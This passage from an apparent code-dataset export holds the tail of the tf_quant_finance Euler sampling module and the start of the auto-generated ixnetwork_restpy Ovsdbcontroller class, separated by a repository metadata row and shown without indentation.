import tensorflow as tf
import tf_quant_finance as tff
import numpy as np
mu = np.array([0.2, 0.7])
s = np.array([[0.3, 0.1], [0.1, 0.3]])
num_samples = 10000
dim = 2
dtype = tf.float64
# Define drift and volatility functions
def drift_fn(t, x):
return mu * tf.sqrt(t) * tf.ones([num_samples, dim], dtype=dtype)
def vol_fn(t, x):
return s * tf.ones([num_samples, dim, dim], dtype=dtype)
# Set starting location
x0 = np.array([0.1, -1.1])
# Sample `num_samples` paths at specified `times` using Euler scheme.
times = [0.1, 1.0, 2.0]
paths = tff.models.euler_sampling.sample(
dim=dim,
drift_fn=drift_fn,
volatility_fn=vol_fn,
times=times,
num_samples=num_samples,
initial_state=x0,
time_step=0.01,
seed=42,
dtype=dtype)
# Expected: paths.shape = [10000, 3, 2]
```
#### References
[1]: Wikipedia. Euler-Maruyama method:
https://en.wikipedia.org/wiki/Euler-Maruyama_method
Args:
dim: Python int greater than or equal to 1. The dimension of the Ito
Process.
drift_fn: A Python callable to compute the drift of the process. The
callable should accept two real `Tensor` arguments of the same dtype.
The first argument is the scalar time t, the second argument is the
value of Ito process X - tensor of shape
`batch_shape + [num_samples, dim]`. `batch_shape` is the shape of the
independent stochastic processes being modelled and is inferred from the
initial state `x0`.
The result is value of drift a(t, X). The return value of the callable
is a real `Tensor` of the same dtype as the input arguments and of shape
`batch_shape + [num_samples, dim]`.
volatility_fn: A Python callable to compute the volatility of the process.
The callable should accept two real `Tensor` arguments of the same dtype
and shape `times_shape`. The first argument is the scalar time t, the
second argument is the value of Ito process X - tensor of shape
`batch_shape + [num_samples, dim]`. The result is value of drift b(t, X).
The return value of the callable is a real `Tensor` of the same dtype as
the input arguments and of shape `batch_shape + [num_samples, dim, dim]`.
times: Rank 1 `Tensor` of increasing positive real values. The times at
which the path points are to be evaluated.
time_step: An optional scalar real `Tensor` - maximal distance between
points in grid in Euler schema.
Either this or `num_time_steps` should be supplied.
Default value: `None`.
num_time_steps: An optional Scalar integer `Tensor` - a total number of time
steps performed by the algorithm. The maximal distance betwen points in
grid is bounded by `times[-1] / (num_time_steps - times.shape[0])`.
Either this or `time_step` should be supplied.
Default value: `None`.
num_samples: Positive scalar `int`. The number of paths to draw.
Default value: 1.
initial_state: `Tensor` of shape broadcastable with
`batch_shape + [num_samples, dim]`. The initial state of the process.
`batch_shape` represents the shape of the independent batches of the
stochastic process. Note that `batch_shape` is inferred from
the `initial_state` and hence when sampling is requested for a batch of
stochastic processes, the shape of `initial_state` should be at least
`batch_shape + [1, 1]`.
Default value: None which maps to a zero initial state.
random_type: Enum value of `RandomType`. The type of (quasi)-random
number generator to use to generate the paths.
Default value: None which maps to the standard pseudo-random numbers.
seed: Seed for the random number generator. The seed is
only relevant if `random_type` is one of
`[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,
STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and
`HALTON_RANDOMIZED` the seed should be a Python integer. For
`STATELESS` and `STATELESS_ANTITHETIC `must be supplied as an integer
`Tensor` of shape `[2]`.
Default value: `None` which means no seed is set.
swap_memory: A Python bool. Whether GPU-CPU memory swap is enabled for this
op. See an equivalent flag in `tf.while_loop` documentation for more
details. Useful when computing a gradient of the op since `tf.while_loop`
is used to propagate stochastic process in time.
Default value: True.
skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or
Halton sequence to skip. Used only when `random_type` is 'SOBOL',
'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.
Default value: `0`.
precompute_normal_draws: Python bool. Indicates whether the noise increments
`N(0, t_{n+1}) - N(0, t_n)` are precomputed. For `HALTON` and `SOBOL`
random types the increments are always precomputed. While the resulting
graph consumes more memory, the performance gains might be significant.
Default value: `True`.
times_grid: An optional rank 1 `Tensor` representing time discretization
grid. If `times` are not on the grid, then the nearest points from the
grid are used. When supplied, `num_time_steps` and `time_step` are
ignored.
Default value: `None`, which means that times grid is computed using
`time_step` and `num_time_steps`.
normal_draws: A `Tensor` of shape broadcastable with
`batch_shape + [num_samples, num_time_points, dim]` and the same
`dtype` as `times`. Represents random normal draws to compute increments
`N(0, t_{n+1}) - N(0, t_n)`. When supplied, `num_samples` argument is
ignored and the first dimensions of `normal_draws` is used instead.
Default value: `None` which means that the draws are generated by the
algorithm. By default normal_draws for each model in the batch are
independent.
watch_params: An optional list of zero-dimensional `Tensor`s of the same
`dtype` as `initial_state`. If provided, specifies `Tensor`s with respect
to which the differentiation of the sampling function will happen.
A more efficient algorithm is used when `watch_params` are specified.
Note the the function becomes differentiable onlhy wrt to these `Tensor`s
and the `initial_state`. The gradient wrt any other `Tensor` is set to be
zero.
validate_args: Python `bool`. When `True` performs multiple checks:
* That `times` are increasing with the minimum increments of the
specified tolerance.
* If `normal_draws` are supplied, checks that `normal_draws.shape[1]` is
equal to `num_time_steps` that is either supplied as an argument or
computed from `time_step`.
When `False` invalid dimension may silently render incorrect outputs.
Default value: `False`.
tolerance: A non-negative scalar `Tensor` specifying the minimum tolerance
for discernible times on the time grid. Times that are closer than the
tolerance are perceived to be the same.
Default value: `None` which maps to `1-e6` if the for single precision
`dtype` and `1e-10` for double precision `dtype`.
dtype: `tf.Dtype`. If supplied the dtype for the input and output `Tensor`s.
Default value: None which means that the dtype implied by `times` is
used.
name: Python string. The name to give this op.
Default value: `None` which maps to `euler_sample`.
Returns:
A real `Tensor` of shape batch_shape_process + [num_samples, k, n] where `k`
is the size of the `times`, `n` is the dimension of the process.
Raises:
ValueError:
(a) When `times_grid` is not supplied, and neither `num_time_steps` nor
`time_step` are supplied or if both are supplied.
(b) If `normal_draws` is supplied and `dim` is mismatched.
tf.errors.InvalidArgumentError: If `normal_draws` is supplied and
`num_time_steps` is mismatched.
"""
name = name or 'euler_sample'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, dtype=dtype)
if dtype is None:
dtype = times.dtype
asserts = []
if tolerance is None:
tolerance = 1e-10 if dtype == tf.float64 else 1e-6
tolerance = tf.convert_to_tensor(tolerance, dtype=dtype)
if validate_args:
asserts.append(
tf.assert_greater(
times[1:], times[:-1] + tolerance,
message='`times` increments should be greater '
'than tolerance {0}'.format(tolerance)))
if initial_state is None:
initial_state = tf.zeros(dim, dtype=dtype)
initial_state = tf.convert_to_tensor(initial_state, dtype=dtype,
name='initial_state')
batch_shape = tff_utils.get_shape(initial_state)[:-2]
num_requested_times = tff_utils.get_shape(times)[0]
# Create a time grid for the Euler scheme.
if num_time_steps is not None and time_step is not None:
raise ValueError(
'When `times_grid` is not supplied only one of either '
'`num_time_steps` or `time_step` should be defined but not both.')
if times_grid is None:
if time_step is None:
if num_time_steps is None:
raise ValueError(
'When `times_grid` is not supplied, either `num_time_steps` '
'or `time_step` should be defined.')
num_time_steps = tf.convert_to_tensor(
num_time_steps, dtype=tf.int32, name='num_time_steps')
time_step = times[-1] / tf.cast(num_time_steps, dtype=dtype)
else:
time_step = tf.convert_to_tensor(time_step, dtype=dtype,
name='time_step')
else:
times_grid = tf.convert_to_tensor(times_grid, dtype=dtype,
name='times_grid')
if validate_args:
asserts.append(
tf.assert_greater(
times_grid[1:], times_grid[:-1] + tolerance,
message='`times_grid` increments should be greater '
'than tolerance {0}'.format(tolerance)))
times, keep_mask, time_indices = utils.prepare_grid(
times=times,
time_step=time_step,
num_time_steps=num_time_steps,
times_grid=times_grid,
tolerance=tolerance,
dtype=dtype)
if normal_draws is not None:
normal_draws = tf.convert_to_tensor(normal_draws, dtype=dtype,
name='normal_draws')
# Shape [num_time_points] + batch_shape + [num_samples, dim]
normal_draws_rank = normal_draws.shape.rank
perm = tf.concat(
[[normal_draws_rank-2], tf.range(normal_draws_rank-2),
[normal_draws_rank-1]], axis=0)
normal_draws = tf.transpose(normal_draws, perm=perm)
num_samples = tf.shape(normal_draws)[-2]
draws_dim = normal_draws.shape[-1]
if dim != draws_dim:
raise ValueError(
'`dim` should be equal to `normal_draws.shape[2]` but are '
'{0} and {1} respectively'.format(dim, draws_dim))
if validate_args:
draws_times = tff_utils.get_shape(normal_draws)[0]
asserts.append(tf.assert_equal(
draws_times, tf.shape(keep_mask)[0] - 1,
message='`num_time_steps` should be equal to '
'`tf.shape(normal_draws)[1]`'))
if validate_args:
with tf.control_dependencies(asserts):
times = tf.identity(times)
if watch_params is not None:
watch_params = [tf.convert_to_tensor(param, dtype=dtype)
for param in watch_params]
return _sample(
dim=dim,
batch_shape=batch_shape,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
times=times,
keep_mask=keep_mask,
num_requested_times=num_requested_times,
num_samples=num_samples,
initial_state=initial_state,
random_type=random_type,
seed=seed,
swap_memory=swap_memory,
skip=skip,
precompute_normal_draws=precompute_normal_draws,
normal_draws=normal_draws,
watch_params=watch_params,
time_indices=time_indices,
dtype=dtype)
def _sample(*,
dim,
batch_shape,
drift_fn,
volatility_fn,
times,
keep_mask,
num_requested_times,
num_samples,
initial_state,
random_type,
seed, swap_memory,
skip,
precompute_normal_draws,
watch_params,
time_indices,
normal_draws,
dtype):
"""Returns a sample of paths from the process using Euler method."""
dt = times[1:] - times[:-1]
sqrt_dt = tf.sqrt(dt)
# current_state.shape = batch_shape + [num_samples, dim]
current_state = initial_state + tf.zeros([num_samples, dim], dtype=dtype)
steps_num = tff_utils.get_shape(dt)[-1]
wiener_mean = None
if normal_draws is None:
# In order to use low-discrepancy random_type we need to generate the
# sequence of independent random normals upfront. We also precompute random
# numbers for stateless random type in order to ensure independent samples
# for multiple function calls whith different seeds.
if precompute_normal_draws or random_type in (
random.RandomType.SOBOL,
random.RandomType.HALTON,
random.RandomType.HALTON_RANDOMIZED,
random.RandomType.STATELESS,
random.RandomType.STATELESS_ANTITHETIC):
normal_draws = utils.generate_mc_normal_draws(
num_normal_draws=dim, num_time_steps=steps_num,
num_sample_paths=num_samples, batch_shape=batch_shape,
random_type=random_type, dtype=dtype, seed=seed, skip=skip)
wiener_mean = None
else:
# If pseudo or anthithetic sampling is used, proceed with random sampling
# at each step.
wiener_mean = tf.zeros((dim,), dtype=dtype, name='wiener_mean')
normal_draws = None
if watch_params is None:
# Use while_loop if `watch_params` is not passed
return _while_loop(
steps_num=steps_num,
current_state=current_state,
drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
num_samples=num_samples, times=times,
dt=dt, sqrt_dt=sqrt_dt, keep_mask=keep_mask,
num_requested_times=num_requested_times,
swap_memory=swap_memory,
random_type=random_type, seed=seed, normal_draws=normal_draws,
dtype=dtype)
else:
# Use custom for_loop if `watch_params` is specified
return _for_loop(
batch_shape=batch_shape, steps_num=steps_num,
current_state=current_state,
drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
num_samples=num_samples, times=times,
dt=dt, sqrt_dt=sqrt_dt, time_indices=time_indices,
keep_mask=keep_mask, watch_params=watch_params,
random_type=random_type, seed=seed, normal_draws=normal_draws)
def _while_loop(*, steps_num, current_state,
drift_fn, volatility_fn, wiener_mean,
num_samples, times, dt, sqrt_dt, num_requested_times,
keep_mask, swap_memory, random_type, seed, normal_draws, dtype):
"""Sample paths using tf.while_loop."""
written_count = 0
if isinstance(num_requested_times, int) and num_requested_times == 1:
record_samples = False
result = current_state
else:
# If more than one sample has to be recorded, create a TensorArray
record_samples = True
element_shape = current_state.shape
result = tf.TensorArray(dtype=dtype,
size=num_requested_times,
element_shape=element_shape,
clear_after_read=False)
# Include initial state, if necessary
result = result.write(written_count, current_state)
written_count += tf.cast(keep_mask[0], dtype=tf.int32)
# Define sampling while_loop body function
def cond_fn(i, written_count, *args):
# It can happen that `times_grid[-1] > times[-1]` in which case we have
# to terminate when `written_count` reaches `num_requested_times`
del args
return tf.math.logical_and(i < steps_num,
written_count < num_requested_times)
def step_fn(i, written_count, current_state, result):
return _euler_step(
i=i,
written_count=written_count,
current_state=current_state,
result=result,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
wiener_mean=wiener_mean,
num_samples=num_samples,
times=times,
dt=dt,
sqrt_dt=sqrt_dt,
keep_mask=keep_mask,
random_type=random_type,
seed=seed,
normal_draws=normal_draws,
record_samples=record_samples)
# Sample paths
_, _, _, result = tf.while_loop(
cond_fn, step_fn, (0, written_count, current_state, result),
maximum_iterations=steps_num,
swap_memory=swap_memory)
if not record_samples:
# shape batch_shape + [num_samples, 1, dim]
return tf.expand_dims(result, axis=-2)
# Shape [num_time_points] + batch_shape + [num_samples, dim]
result = result.stack()
# transpose to shape batch_shape + [num_samples, num_time_points, dim]
n = result.shape.rank
perm = list(range(1, n-1)) + [0, n - 1]
return tf.transpose(result, perm)
def _for_loop(*, batch_shape, steps_num, current_state,
drift_fn, volatility_fn, wiener_mean, watch_params,
num_samples, times, dt, sqrt_dt, time_indices,
keep_mask, random_type, seed, normal_draws):
"""Sample paths using custom for_loop."""
del batch_shape
num_time_points = time_indices.shape.as_list()[:-1]
if isinstance(num_time_points, int) and num_time_points == 1:
iter_nums = steps_num
else:
iter_nums = time_indices
def step_fn(i, current_state):
# Unpack current_state
current_state = current_state[0]
_, _, next_state, _ = _euler_step(
i=i,
written_count=0,
current_state=current_state,
result=current_state,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
wiener_mean=wiener_mean,
num_samples=num_samples,
times=times,
dt=dt,
sqrt_dt=sqrt_dt,
keep_mask=keep_mask,
random_type=random_type,
seed=seed,
normal_draws=normal_draws,
record_samples=False)
return [next_state]
result = custom_loops.for_loop(
body_fn=step_fn,
initial_state=[current_state],
params=watch_params,
num_iterations=iter_nums)[0]
if num_time_points == 1:
return tf.expand_dims(result, axis=-2)
# result.shape=[num_time_points] + batch_shape + [num_samples, dim]
# transpose to shape=batch_shape + [num_time_points, num_samples, dim]
n = result.shape.rank
perm = list(range(1, n-1)) + [0, n - 1]
return tf.transpose(result, perm)
def _euler_step(*, i, written_count, current_state,
drift_fn, volatility_fn, wiener_mean,
num_samples, times, dt, sqrt_dt, keep_mask,
random_type, seed, normal_draws, result,
record_samples):
"""Performs one step of Euler scheme."""
current_time = times[i + 1]
written_count = tf.cast(written_count, tf.int32)
if normal_draws is not None:
dw = normal_draws[i]
else:
dw = random.mv_normal_sample(
(num_samples,), mean=wiener_mean, random_type=random_type,
seed=seed)
dw = dw * sqrt_dt[i]
dt_inc = dt[i] * drift_fn(current_time, current_state) # pylint: disable=not-callable
dw_inc = tf.linalg.matvec(volatility_fn(current_time, current_state), dw) # pylint: disable=not-callable
next_state = current_state + dt_inc + dw_inc
if record_samples:
result = result.write(written_count, next_state)
else:
result = next_state
written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)
return i + 1, written_count, next_state, result
__all__ = ['sample']
| [
"[email protected]"
] | |
823d1a2718699ef51208e2f707d1e8d3994fa6a8 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ovsdbcontroller_789ff2911c009a5ce719da4041ccbf73.py | f77a1ef26f1ad4fed45de942f83349bbf533fa7d | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,934 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Ovsdbcontroller(Base):
"""
The Ovsdbcontroller class encapsulates a list of ovsdbcontroller resources that are managed by the user.
A list of resources can be retrieved from the server using the Ovsdbcontroller.find() method.
The list can be managed by using the Ovsdbcontroller.add() and Ovsdbcontroller.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'ovsdbcontroller'
_SDM_ATT_MAP = {
'ClearDumpDbFiles': 'clearDumpDbFiles',
'ConnectedVia': 'connectedVia',
'ConnectionType': 'connectionType',
'ControllerTcpPort': 'controllerTcpPort',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DirectoryName': 'directoryName',
'DumpdbDirectoryName': 'dumpdbDirectoryName',
'EnableLogging': 'enableLogging',
'EnableOvsdbServerIp': 'enableOvsdbServerIp',
'ErrorCode': 'errorCode',
'ErrorDesc': 'errorDesc',
'ErrorLogDirectoryName': 'errorLogDirectoryName',
'ErrorLogicalSwitchName': 'errorLogicalSwitchName',
'ErrorPhysicalSwitchName': 'errorPhysicalSwitchName',
'ErrorTimeStamp': 'errorTimeStamp',
'Errors': 'errors',
'FileCaCertificate': 'fileCaCertificate',
'FileCertificate': 'fileCertificate',
'FileHWGatewayCertificate': 'fileHWGatewayCertificate',
'FilePrivKey': 'filePrivKey',
'HSCConfiguration': 'hSCConfiguration',
'LatestDumpDbFileNames': 'latestDumpDbFileNames',
'LatestErrorFileNames': 'latestErrorFileNames',
'Multiplier': 'multiplier',
'Name': 'name',
'OvsdbSchema': 'ovsdbSchema',
'OvsdbServerIp': 'ovsdbServerIp',
'PseudoConnectedTo': 'pseudoConnectedTo',
'PseudoConnectedToBfd': 'pseudoConnectedToBfd',
'PseudoConnectedToVxlanReplicator': 'pseudoConnectedToVxlanReplicator',
'PseudoMultiplier': 'pseudoMultiplier',
'PseudoMultiplierBfd': 'pseudoMultiplierBfd',
'PseudoMultiplierVxlanReplicator': 'pseudoMultiplierVxlanReplicator',
'Role': 'role',
'ServerAddDeleteConnectionError': 'serverAddDeleteConnectionError',
'ServerAddDeleteStatus': 'serverAddDeleteStatus',
'ServerConnectionIp': 'serverConnectionIp',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'TableNames': 'tableNames',
'TimeOut': 'timeOut',
'VerifyHWGatewayCertificate': 'verifyHWGatewayCertificate',
'VerifyPeerCertificate': 'verifyPeerCertificate',
'Vxlan': 'vxlan',
'VxlanReplicator': 'vxlanReplicator',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(Ovsdbcontroller, self).__init__(parent, list_op)
@property
def ClusterData(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337.ClusterData): An instance of the ClusterData class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337 import ClusterData
if self._properties.get('ClusterData', None) is not None:
return self._properties.get('ClusterData')
else:
return ClusterData(self)._select()
@property
def Connector(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
if self._properties.get('Connector', None) is not None:
return self._properties.get('Connector')
else:
return Connector(self)
@property
def ClearDumpDbFiles(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ClearDumpDbFiles']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def ConnectionType(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Connection should use TCP or TLS
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ConnectionType']))
@property
def ControllerTcpPort(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Specify the TCP port for the Controller
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ControllerTcpPort']))
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the Certificate and Key Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DirectoryName']))
@property
def DumpdbDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the DumpDb Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DumpdbDirectoryName']))
@property
def EnableLogging(self):
# type: () -> bool
"""
Returns
-------
- bool: If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableLogging'])
@EnableLogging.setter
def EnableLogging(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['EnableLogging'], value)
@property
def EnableOvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableOvsdbServerIp']))
@property
def ErrorCode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error Code
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorCode']))
@property
def ErrorDesc(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Description of Error occured
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorDesc']))
@property
def ErrorLogDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the ErrorLog Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogDirectoryName']))
@property
def ErrorLogicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error occured for this Logical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogicalSwitchName']))
@property
def ErrorPhysicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error occured for this Physical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorPhysicalSwitchName']))
@property
def ErrorTimeStamp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Time Stamp at which Last Error occurred
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorTimeStamp']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def FileCaCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): CA Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCaCertificate']))
@property
def FileCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCertificate']))
@property
def FileHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): HW Gateway Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileHWGatewayCertificate']))
@property
def FilePrivKey(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Private Key File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FilePrivKey']))
@property
def HSCConfiguration(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Each VTEP has its own Hardware Switch Controller.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HSCConfiguration']))
@property
def LatestDumpDbFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest DumpDb Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'])
@LatestDumpDbFileNames.setter
def LatestDumpDbFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'], value)
@property
def LatestErrorFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest Error Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'])
@LatestErrorFileNames.setter
def LatestErrorFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'], value)
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def OvsdbSchema(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Database schema
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbSchema']))
@property
def OvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbServerIp']))
@property
def PseudoConnectedTo(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'])
@PseudoConnectedTo.setter
def PseudoConnectedTo(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'], value)
@property
def PseudoConnectedToBfd(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'])
@PseudoConnectedToBfd.setter
def PseudoConnectedToBfd(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'], value)
@property
def PseudoConnectedToVxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'])
@PseudoConnectedToVxlanReplicator.setter
def PseudoConnectedToVxlanReplicator(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'], value)
@property
